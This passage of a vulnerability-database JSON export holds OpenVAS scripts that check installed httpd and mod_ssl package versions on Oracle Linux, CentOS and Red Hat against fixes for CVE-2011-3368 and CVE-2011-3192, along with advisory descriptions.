See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122068\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:32 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1391\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1391 - httpd security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1391\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1391.html\");\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", 
rpm:\"httpd~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-25T10:55:32", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2011-11-11T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:881032", "href": "http://plugins.openvas.org/nasl.php?oid=881032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS 
FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"httpd on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\");\n script_id(881032);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:54:14 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 i386\");\n\n script_summary(\"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-11T11:07:44", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:881436", "href": "http://plugins.openvas.org/nasl.php?oid=881436", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\");\n script_id(881436);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:52:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", 
rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:27", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2011-10-21T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1392-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:870505", "href": "http://plugins.openvas.org/nasl.php?oid=870505", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1392-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux (v. 
5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00016.html\");\n script_id(870505);\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1392-01\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"RedHat Update for httpd RHSA-2011:1392-01\");\n\n script_summary(\"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:56", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2011-10-21T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": 
"2017-07-10T00:00:00", "id": "OPENVAS:881020", "href": "http://plugins.openvas.org/nasl.php?oid=881020", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"httpd on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-October/018126.html\");\n script_id(881020);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 i386\");\n\n script_summary(\"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-10-21T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881020", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881020", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for 
httpd CESA-2011:1392 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-October/018126.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881020\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-05-12T17:32:44", "description": "Apache HTTP Server is prone to an information disclosure\n vulnerability.", "cvss3": {}, "published": "2011-10-11T00:00:00", "type": "openvas", "title": "Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3368"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310103293", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103293", "sourceData": "# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
